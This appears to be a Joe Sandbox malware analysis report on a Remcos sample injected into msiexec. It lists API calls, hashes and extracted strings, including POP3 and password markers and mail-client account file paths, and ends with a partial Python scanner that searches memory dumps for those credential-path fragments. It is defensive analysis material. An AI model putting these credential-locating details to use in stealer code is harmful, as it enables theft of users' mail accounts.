• Instruction Fuzzy Hash: 27E0463A000308EFCF01AF68CE08A493B2AEF46351F004410FE2E8B462EB39D996DB44
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .
                                                                                                        • API String ID: 0-248832578
                                                                                                        • Opcode ID: 65f3815672f67ba8848efd44d01acbaefdaf6ab0caec80e79597ff7ea506a451
                                                                                                        • Instruction ID: ced20a17cb7bb3abb98a83e82edf5d8beea615852982a5ed5935186f78af6246
                                                                                                        • Opcode Fuzzy Hash: 65f3815672f67ba8848efd44d01acbaefdaf6ab0caec80e79597ff7ea506a451
                                                                                                        • Instruction Fuzzy Hash: FC3106B5900329EFCB148E78CD84EEA7BBDDB86314F0401A8F91E97293E631DA45CB50
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: 61d278311fb5a2799ad38a130e8b6d9228cd850422a1ee1f0a795d559f111ef7
                                                                                                        • Instruction ID: 3905b38bd09e328790e127ac585901585bfb432f922ce774782c186b6d7cb8f0
                                                                                                        • Opcode Fuzzy Hash: 61d278311fb5a2799ad38a130e8b6d9228cd850422a1ee1f0a795d559f111ef7
                                                                                                        • Instruction Fuzzy Hash: A3A01130282202CF83208E308A0A20C3AACAA002A030A0828BE0AC8088FB2CC0008A00

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 228E1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D1B
                                                                                                          • Part of subcall function 228E1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 228E1D37
                                                                                                          • Part of subcall function 228E1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D4B
                                                                                                        • _strlen.LIBCMT ref: 228E1855
                                                                                                        • _strlen.LIBCMT ref: 228E1869
                                                                                                        • _strlen.LIBCMT ref: 228E188B
                                                                                                        • _strlen.LIBCMT ref: 228E18AE
                                                                                                        • _strlen.LIBCMT ref: 228E18C8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen$File$CopyCreateDelete
                                                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                        • API String ID: 3296212668-3023110444
                                                                                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                        • Instruction ID: a66efc0c7dcf60d885727699a5472828d0df047f6028bd4bd2644a1e31670beb
                                                                                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                        • Instruction Fuzzy Hash: DA61E579D00318EAEF199BA8C840BEEB7B9AF17304F404156F20EA7264DB74DE45CB52

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen
                                                                                                        • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                        • API String ID: 4218353326-230879103
                                                                                                        • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                        • Instruction ID: 5a71ceab57732e415fc24e5e30d58d5294d97bfb3cb1dd8e72c3e7b9f200e9e5
                                                                                                        • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                        • Instruction Fuzzy Hash: 0771E775D003289BDB159BA89C84AEF7BFC9F1A304F104096F64DD7141E674DB89CB60

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • ___free_lconv_mon.LIBCMT ref: 228E7D06
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E90D7
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E90E9
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E90FB
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E910D
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E911F
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9131
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9143
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9155
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9167
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E9179
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E918B
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E919D
                                                                                                          • Part of subcall function 228E90BA: _free.LIBCMT ref: 228E91AF
                                                                                                        • _free.LIBCMT ref: 228E7CFB
                                                                                                          • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
                                                                                                          • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
                                                                                                        • _free.LIBCMT ref: 228E7D1D
                                                                                                        • _free.LIBCMT ref: 228E7D32
                                                                                                        • _free.LIBCMT ref: 228E7D3D
                                                                                                        • _free.LIBCMT ref: 228E7D5F
                                                                                                        • _free.LIBCMT ref: 228E7D72
                                                                                                        • _free.LIBCMT ref: 228E7D80
                                                                                                        • _free.LIBCMT ref: 228E7D8B
                                                                                                        • _free.LIBCMT ref: 228E7DC3
                                                                                                        • _free.LIBCMT ref: 228E7DCA
                                                                                                        • _free.LIBCMT ref: 228E7DE7
                                                                                                        • _free.LIBCMT ref: 228E7DFF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID:
                                                                                                        • API String ID: 161543041-0
                                                                                                        • Opcode ID: fa5c57ef2a1f9f15f1d06cb7ef6cee8b9f358e877df1445d60dece46ffcde707
                                                                                                        • Instruction ID: c56e1d6d7d93bd4b1550937dc8ca4ec0c119f5cea2099847f70e93fe1327a9c8
                                                                                                        • Opcode Fuzzy Hash: fa5c57ef2a1f9f15f1d06cb7ef6cee8b9f358e877df1445d60dece46ffcde707
                                                                                                        • Instruction Fuzzy Hash: 1B315B39600344DFDB219E38DA41BAA77EAEF02354F104469FA4ED7195DB79F990CB10

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 228E59EA
                                                                                                          • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
                                                                                                          • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
                                                                                                        • _free.LIBCMT ref: 228E59F6
                                                                                                        • _free.LIBCMT ref: 228E5A01
                                                                                                        • _free.LIBCMT ref: 228E5A0C
                                                                                                        • _free.LIBCMT ref: 228E5A17
                                                                                                        • _free.LIBCMT ref: 228E5A22
                                                                                                        • _free.LIBCMT ref: 228E5A2D
                                                                                                        • _free.LIBCMT ref: 228E5A38
                                                                                                        • _free.LIBCMT ref: 228E5A43
                                                                                                        • _free.LIBCMT ref: 228E5A51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 4182fd568efecde5720ddc30f4421a16c25b32180e2ba5265f626629228d0bd0
                                                                                                        • Instruction ID: 2fa8bc1502c179074efa801e8e46a5fe41a1de2133ac1e0a572ded8adc816eea
                                                                                                        • Opcode Fuzzy Hash: 4182fd568efecde5720ddc30f4421a16c25b32180e2ba5265f626629228d0bd0
                                                                                                        • Instruction Fuzzy Hash: FB11947E510348EFCB21DF58CD42CD93FA5AF15390B054091BA0E8B121DB35DA60DB80

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer
                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                        • Opcode ID: 7f140c781a3fa56f0dbee81e54b51f83ad50c0761fd273da2e7183ca9c3771e5
                                                                                                        • Instruction ID: c2e74efa76fd753d1ec100aab0e2ab7a9a2774879a0f7e20e843718afdab5d03
                                                                                                        • Opcode Fuzzy Hash: 7f140c781a3fa56f0dbee81e54b51f83ad50c0761fd273da2e7183ca9c3771e5
                                                                                                        • Instruction Fuzzy Hash: C3518F7890070DCBDB00CFA4DA845ACBBB4FF5B714F504285F58AA7264D77ACA68CB14

Control-flow Graph (rendered graph not reproduced)
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 228E1D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 228E1D8A
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: bb5c7352835504d61fb28f1bf0b8fc592bd7095c9896f4314c988408b5d290dc
• Instruction ID: 19c3e2589a3d9a5a63a3f0db76ad53f9abd2aa1625e4f60d7713a146578eb220
• Opcode Fuzzy Hash: bb5c7352835504d61fb28f1bf0b8fc592bd7095c9896f4314c988408b5d290dc
• Instruction Fuzzy Hash: 4B215EB5A4121CFFE7109BA48C8CEEF77ACEB19354F0409A5F90AD2185E674DE498B70

Control-flow Graph (rendered graph not reproduced; first basic block 228e9492-228e94ef calling GetConsoleCP, blocks marked Executed / Not Executed)
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,228E9C07,?,00000000,?,00000000,00000000), ref: 228E94D4
• __fassign.LIBCMT ref: 228E954F
• __fassign.LIBCMT ref: 228E956A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 228E9590
• WriteFile.KERNEL32(?,?,00000000,228E9C07,00000000,?,?,?,?,?,?,?,?,?,228E9C07,?), ref: 228E95AF
• WriteFile.KERNEL32(?,?,?,228E9C07,00000000,?,?,?,?,?,?,?,?,?,228E9C07,?), ref: 228E95E8
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 31f71bca59034bed4c63358d3662f1c3072c38cf577eac294b48fc601692ae34
• Instruction ID: e7844ab783796f61590232472f18328f97f652d40f2dfae0f8646dc074c2c2cf
• Opcode Fuzzy Hash: 31f71bca59034bed4c63358d3662f1c3072c38cf577eac294b48fc601692ae34
• Instruction Fuzzy Hash: 865192B5D00249DFDB10CFA8C891ADEBBF8EF49300F14451AF95AE7291E674D941CB60

Control-flow Graph (rendered graph not reproduced; first basic block 228e3370-228e33b5, blocks marked Executed / Not Executed)
APIs
• _ValidateLocalCookies.LIBCMT ref: 228E339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 228E33A3
• _ValidateLocalCookies.LIBCMT ref: 228E3431
• __IsNonwritableInCurrentImage.LIBCMT ref: 228E345C
• _ValidateLocalCookies.LIBCMT ref: 228E34B1
Strings
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: fd5dff4658facaa99832d5baf2f08dd322f88cb2509f140098693cb49b9c8afd
• Instruction ID: 21afd4c17027ef5c2217e8821043cabee39850629d80a78d1e045219bae9517f
• Opcode Fuzzy Hash: fd5dff4658facaa99832d5baf2f08dd322f88cb2509f140098693cb49b9c8afd
• Instruction Fuzzy Hash: E6418238A00348EBCB01DF68D840AAEBBA5AF56328F14C1A5F91E5F251D735DE15CB91

Control-flow Graph (rendered graph not reproduced)
APIs
  • Part of subcall function 228E9221: _free.LIBCMT ref: 228E924A
• _free.LIBCMT ref: 228E92AB
  • Part of subcall function 228E571E: HeapFree.KERNEL32(00000000,00000000,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?), ref: 228E5734
  • Part of subcall function 228E571E: GetLastError.KERNEL32(?,?,228E924F,?,00000000,?,00000000,?,228E9276,?,00000007,?,?,228E7E5A,?,?), ref: 228E5746
• _free.LIBCMT ref: 228E92B6
• _free.LIBCMT ref: 228E92C1
• _free.LIBCMT ref: 228E9315
• _free.LIBCMT ref: 228E9320
• _free.LIBCMT ref: 228E932B
• _free.LIBCMT ref: 228E9336
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction ID: a5d9f1b70017efc5ad3b6c03b12ecad7f24cd7c2109f5a767e76fb12ee4cbe88
• Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction Fuzzy Hash: D8117F35940B08EADA30ABB4DD46FCB7BDD9F16700F400825B6BF76052DBA8F514D651

Control-flow Graph (rendered graph not reproduced; first basic block 228e8821-228e883a, blocks marked Executed / Not Executed)
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,228E6FFD,00000000,?,?,?,228E8A72,?,?,00000100), ref: 228E887B
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,228E8A72,?,?,00000100,5EFC4D8B,?,?), ref: 228E8901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 228E89FB
• __freea.LIBCMT ref: 228E8A08
  • Part of subcall function 228E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 228E5702
• __freea.LIBCMT ref: 228E8A11
• __freea.LIBCMT ref: 228E8A36
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 0f17f7525874739cf3d55e3ef6c322829e1eb7e643e4ef33c60f4e2cde7e6cfe
• Instruction ID: a90c89aa70c633dedc90c528b8bf1db4121c82636bc337b86c400e7b6630a313
• Opcode Fuzzy Hash: 0f17f7525874739cf3d55e3ef6c322829e1eb7e643e4ef33c60f4e2cde7e6cfe
• Instruction Fuzzy Hash: AA51F176A10316EFEB158E64CD40FAF37A9EB52754F500628FD0ED61A0EB34DC60C6A2

Control-flow Graph (rendered graph not reproduced)
APIs
• _strlen.LIBCMT ref: 228E1607
• _strcat.LIBCMT ref: 228E161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,228E190E,?,?,00000000,?,00000000), ref: 228E1643
• lstrcatW.KERNEL32(?,?,?,?,?,?,228E190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 228E165A
• lstrlenW.KERNEL32(?,?,?,?,?,228E190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 228E1661
• lstrcatW.KERNEL32(00001008,?,?,?,?,?,228E190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 228E1686
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
• Opcode ID: e2f58fdb78d34a74f02fc3948d721a265037788934e066fd33e58c5222fff653
• Instruction ID: 45a7b6e9761b923f5150d1981299d9c1e8daa888d8983364f6dff22e165086d2
• Opcode Fuzzy Hash: e2f58fdb78d34a74f02fc3948d721a265037788934e066fd33e58c5222fff653
• Instruction Fuzzy Hash: EC21B63AA00304EBD7059B58DC80EFE77B8EF89714F14841AF909AB191EB74EA45C7A5

Control-flow Graph (rendered graph not reproduced)
APIs
• lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 228E1038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 228E104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 228E1061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 228E1075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 228E1090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 228E10B8
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: 57668892f7c9647f0ab415eb38e0e6c2acb5c3b1baa3eabbe50bd89bcb4df223
• Instruction ID: 6eb0bef8041f02c33a507a5c822628373481f4df549fca3ad28473983efa7a9c
• Opcode Fuzzy Hash: 57668892f7c9647f0ab415eb38e0e6c2acb5c3b1baa3eabbe50bd89bcb4df223
• Instruction Fuzzy Hash: 7B218D39900318DBCF149A64DD48EEB3768EB45324F104696F96EA31A1DA70DE89CB40
APIs
• GetLastError.KERNEL32(?,?,228E3518,228E23F1,228E1F17), ref: 228E3864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 228E3872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 228E388B
• SetLastError.KERNEL32(00000000,?,228E3518,228E23F1,228E1F17), ref: 228E38DD
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 88df231b4f2edbbe315b47c11b37275f36060f237b331463c668121c09452aca
• Instruction ID: 463bf51df0d85b3db26d586608d046c38d46f36c69d86a5d9100423ffa6214d2
• Opcode Fuzzy Hash: 88df231b4f2edbbe315b47c11b37275f36060f237b331463c668121c09452aca
• Instruction Fuzzy Hash: F701FC3AA49725DDA204257D6C85E262798DB97774F20033AFA3F6D4D5EF19CC01C354
APIs
• GetLastError.KERNEL32(?,?,228E6C6C), ref: 228E5AFA
• _free.LIBCMT ref: 228E5B2D
• _free.LIBCMT ref: 228E5B55
• SetLastError.KERNEL32(00000000,?,?,228E6C6C), ref: 228E5B62
• SetLastError.KERNEL32(00000000,?,?,228E6C6C), ref: 228E5B6E
• _abort.LIBCMT ref: 228E5B74
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 5121d33d7114d459a9ca259bbcbf5b4b7da80f4b2a58749e6508e00cb46c61dc
• Instruction ID: 0153a95b1560f4a6bb760bd927ae03d546387b7ad4fdf9e40f98a225ba46ba58
• Opcode Fuzzy Hash: 5121d33d7114d459a9ca259bbcbf5b4b7da80f4b2a58749e6508e00cb46c61dc
• Instruction Fuzzy Hash: D3F0A4BE544701EAC2022E38AD45F0A27E99BE3671F240525FE2FAA1C5FF6DC5068164
APIs
  • Part of subcall function 228E1E89: lstrlenW.KERNEL32(?,?,?,?,?,228E10DF,?,?,?,00000000), ref: 228E1E9A
  • Part of subcall function 228E1E89: lstrcatW.KERNEL32(?,?,?,228E10DF,?,?,?,00000000), ref: 228E1EAC
  • Part of subcall function 228E1E89: lstrlenW.KERNEL32(?,?,228E10DF,?,?,?,00000000), ref: 228E1EB3
  • Part of subcall function 228E1E89: lstrlenW.KERNEL32(?,?,228E10DF,?,?,?,00000000), ref: 228E1EC8
  • Part of subcall function 228E1E89: lstrcatW.KERNEL32(?,228E10DF,?,228E10DF,?,?,?,00000000), ref: 228E1ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 228E122A
  • Part of subcall function 228E173A: _strlen.LIBCMT ref: 228E1855
  • Part of subcall function 228E173A: _strlen.LIBCMT ref: 228E1869
Strings
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
• Opcode ID: fd44ef4097ae0895a7cd564c948dfe46c2aa5ac9c7705493c03142e3fa972d96
• Instruction ID: 0a8d8fc3524e848deda1ac48cc44fec6becc008da8b03f7c73be45a6c967b178
• Opcode Fuzzy Hash: fd44ef4097ae0895a7cd564c948dfe46c2aa5ac9c7705493c03142e3fa972d96
• Instruction Fuzzy Hash: 3921B17DA10308EAEB1497A4EC81BFD7339EF80714F400556F60AEB2E4E6B19E80C759
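The function above builds mail-client profile paths with lstrcatW from the four fragments in its String ID field and probes each with GetFileAttributesW, which is the file-based half of the report's "steal Mail credentials" finding. The scanner below is an added example for this page, not Joe Sandbox code and not part of the sample: it searches a memory dump (an .sdmp from the report, or any raw region) for those fragments and reports their virtual addresses. The fragments are taken verbatim from the String ID; because the routine uses the wide-character APIs, the dump is assumed to hold them as UTF-16LE, so the scanner checks that encoding first and ANSI as a fallback. The dump bytes embedded for the demonstration are constructed, not taken from the report.

```python
"""Scan a memory dump for the mail-profile path fragments seen in the
function at 228E122A. Added example for this report page; not Joe
Sandbox code and not part of the Remcos sample."""
import re
import sys

# Fragments copied from the report's String ID field. Assumption: the
# routine concatenates them with lstrcatW and tests the result with
# GetFileAttributesW, so the in-memory encoding is most likely UTF-16LE.
MAIL_PATH_FRAGMENTS = (
    "\\Accounts\\Account.rec0",
    "\\Data\\AccCfg\\Accounts.tdat",
    "\\Mail\\",
    "\\Storage\\",
)


def _patterns():
    """Compile one byte pattern per (fragment, encoding) pair."""
    pats = []
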